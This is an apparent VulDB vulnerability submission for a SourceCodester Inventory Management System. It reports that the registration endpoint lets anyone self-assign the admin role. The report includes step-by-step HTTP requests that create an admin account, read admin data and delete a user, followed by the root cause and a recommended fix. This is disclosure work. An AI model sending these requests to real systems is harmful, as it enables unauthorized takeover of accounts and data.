제출 #844257: SourceCodester Inventory Management System NA Improper Access Controls정보

제목	SourceCodester Inventory Management System NA Improper Access Controls
설명	Summary The user registration endpoint at POST /api/users_handler.php accepts a role parameter directly from user input without server-side validation. Any unauthenticated visitor can register an account with role=admin, granting immediate access to the admin panel, user management (create/delete/modify users), and all administrative functions. No privileges, approval workflow, or additional verification is required. Vulnerability Details Vulnerability Type: Broken Access Control — Privilege Escalation via Mass Assignment CVSS 3.1 Score: 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Affected Endpoint: POST /api/users_handler.php with action=register Vulnerable Parameter: role (line 38 of api/users_handler.php) Steps to Reproduce Environment: - Target: http://localhost/Product_Inventory/ - Attacker: Unauthenticated (no account needed) Steps: 1. Send the following request to register a new admin account: POST /Product_Inventory/api/users_handler.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded action=register&username=attacker&password=attacker123&full_name=Attacker+User&role=admin 2. Observe the successful response: {"success":true,"message":"User registered successfully!"} 3. Log in with the newly created admin account: POST /Product_Inventory/api/users_handler.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded action=login&username=attacker&password=attacker123 4. Response confirms successful authentication: {"success":true,"message":"Login successful!"} 5. Access admin-only endpoints (verified): POST /Product_Inventory/api/users_handler.php HTTP/1.1 Host: localhost Cookie: PHPSESSID=<session_cookie> action=get_user&id=1 Response returns full admin user details: {"id":1,"username":"admin","full_name":"GANESH DUTT","role":"admin"} 6. Modify or delete any user (verified): POST /Product_Inventory/api/users_handler.php HTTP/1.1 Host: localhost Cookie: PHPSESSID=<session_cookie> action=delete_user&id=3 Response: {"success":true,"message":"User deleted successfully!"} Expected: Registration should only create staff accounts. Admin role should require existing admin approval or be hardcoded in the registration flow. Actual: Any user can self-assign the admin role during registration. Root Cause The vulnerable code at api/users_handler.php:38 directly assigns the user-supplied role parameter: $role = $_POST['role'] ?? 'staff'; This value is then inserted into the database without validation: $stmt = $pdo->prepare("INSERT INTO users (username, password, full_name, role) VALUES (?, ?, ?, ?)"); $stmt->execute([$username, $hashed_password, $full_name, $role]); Impact An unauthenticated attacker can: 1. Create admin accounts — Register with role=admin to gain full administrative access 2. Delete any user — Remove legitimate admin accounts via delete_user action 3. Modify user credentials — Change passwords, usernames, and roles of any account via update_user 4. Access admin panel — View user management interface at users.php 5. Full system compromise — Combined with stored XSS vulnerabilities, achieve persistent admin session hijacking This represents a complete authentication bypass. The attacker gains the highest privilege level in the application without any preconditions. Recommended Fix Remove the role parameter from user-controlled input during registration. Hardcode the default role: case 'register': $username = $_POST['username'] ?? ''; $password = $_POST['password'] ?? ''; $full_name = $_POST['full_name'] ?? ''; // FIX: Always assign 'staff' role during self-registration $role = 'staff'; If admin account creation is needed, implement a separate endpoint protected by requireAdmin(): case 'create_admin': requireAdmin(); $role = 'admin'; // ... rest of registration logic Additionally, add server-side role validation as a defense-in-depth measure: $allowed_roles = ['staff', 'admin']; if (!in_array($role, $allowed_roles)) { echo json_encode(['success' => false, 'message' => 'Invalid role.']); exit; }
사용자	Anonymous User
제출	2026. 05. 31. PM 04:23 (29 날 ago)
모더레이션	2026. 06. 28. PM 08:22 (28 days later)
상태	수락
VulDB 항목	374576 [SourceCodester Inventory Management System 1.0 User Registration Endpoint /api/users_handler.php role 권한 상승]
포인트들	17

◂ 이전 개요 다음 ▸

Do you know our Splunk app?

Download it now for free!